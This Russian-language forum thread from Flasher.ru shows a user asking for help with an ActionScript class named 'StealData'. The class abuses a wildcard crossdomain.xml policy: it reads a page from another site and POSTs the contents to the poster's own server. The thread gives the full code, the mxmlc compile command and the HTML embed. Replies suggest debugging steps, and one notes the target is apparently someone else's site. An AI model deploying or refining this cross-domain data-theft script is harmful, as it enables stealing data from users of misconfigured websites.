Форум Flasher.ru
Ближайшие курсы в Школе RealTime
Список интенсивных курсов: [см.]  
  
Специальные предложения: [см.]  
  
 
Блоги Правила Справка Пользователи Календарь Сообщения за день
 

Вернуться   Форум Flasher.ru > Flash > ActionScript 3.0

Версия для печати  Отправить по электронной почте    « Предыдущая тема | Следующая тема »  
Опции темы Опции просмотра
 
Создать новую тему Ответ
Старый 27.09.2017, 14:51
bumblebeee вне форума Посмотреть профиль Отправить личное сообщение для bumblebeee Найти все сообщения от bumblebeee
  № 1  
Ответить с цитированием
bumblebeee

Регистрация: Sep 2017
Сообщений: 1
По умолчанию Кроссдоменные запросы

Вопрос глупенький =) Подскажите, что не так делаю

Пытаюсь получить данные с сайта, где плохо настроена кроссдоменная политика
Код:
allow-access-from domain="*"/
Использую данный скрипт
Код AS1/AS2:
package {
	import flash.display.Sprite;
	import flash.events.*;
	import flash.net.URLRequestMethod;
	import flash.net.URLRequest;
	import flash.net.URLLoader;
 
	public class StealData extends Sprite {
		public function StealData() {
			// Target URL from where the data is to be retrieved
			var readFrom:String = "https://страница, с которой хочу получить данные";
			var readRequest:URLRequest = new URLRequest(readFrom);
			var getLoader:URLLoader = new URLLoader();
			getLoader.addEventListener(Event.COMPLETE, eventHandler);
			try {
				getLoader.load(readRequest);
			} catch (error:Error) {
				trace("Error loading URL: " + error);
			}
		}
 
		private function eventHandler(event:Event):void {
			// URL to which retrieved data is to be sent
			var sendTo:String = "https://моя страница"
			var sendRequest:URLRequest = new URLRequest(sendTo);
			sendRequest.method = URLRequestMethod.POST;
                        var body:String = escape(event.target.data);
			sendRequest.data = body;
			var sendLoader:URLLoader = new URLLoader();
			try {
				sendLoader.load(sendRequest);
			} catch (error:Error) {
				trace("Error loading URL: " + error);
			}
		}
	}
}
Скомпилировал в .swf, обернул в html, поднял апач, положил в веб-директорию.
Открываю в одном окне firefox хтмльку, в другой страничку, которая мне нужна. Просматриваю запросы в burp suite, скрипт обращается с get запросом к html и к файлу .swf. Больше ничего не происходит.
Как я понимаю, результатом работы скрипта должны отсылаться данные со страницы, которая мне нужна, на мою страницу. В чем может быть проблема?

Добавлено через 35 минут
Компилирую:
Код:
mxmlc StealData.as
В html:
Код:
<object width="100" height="100">
    <param name="movie" value="file.swf">
    <embed src="StealData.swf" width="100" height="100">
    </embed>
</object>

Старый 29.09.2017, 01:15
Nooob вне форума Посмотреть профиль Отправить личное сообщение для Nooob Найти все сообщения от Nooob
  № 2  
Ответить с цитированием
Nooob
 
Аватар для Nooob

Регистрация: Mar 2007
Сообщений: 319
эм. настроить нормально кроссдоменную политику?
в корень всех хостов к которым обращаешься положи crossdomain.xml
Код:
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>
__________________
RocketJump

Старый 29.09.2017, 18:07
caseyryan вне форума Посмотреть профиль Отправить личное сообщение для caseyryan Найти все сообщения от caseyryan
  № 3  
Ответить с цитированием
caseyryan
 
Аватар для caseyryan

Регистрация: Jun 2012
Адрес: Новосибирск
Сообщений: 6,644
Записей в блоге: 4
Цитата:
эм. настроить нормально кроссдоменную политику?
Видимо, он не со своего сайта хочет что-то запросить.
Цитата:
Больше ничего не происходит.
А что должно происходить?
Результат запроса надо смотреть внутри приложения. Подпишись на SecurityErrorEvent.SECURITY_ERROR и на IOErrorEvent.IO_ERROR и посмотри срабатывают ли эти обработчики
__________________
Ко мне можно и нужно обращаться на ты)

Создать новую тему Ответ Часовой пояс GMT +4, время: 10:35.
Быстрый переход
  « Предыдущая тема | Следующая тема »  

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.


 


Часовой пояс GMT +4, время: 10:35.


Copyright © 1999-2008 Flasher.ru. All rights reserved.
Работает на vBulletin®. Copyright ©2000 - 2024, Jelsoft Enterprises Ltd. Перевод: zCarot
Администрация сайта не несёт ответственности за любую предоставленную посетителями информацию. Подробнее см. Правила.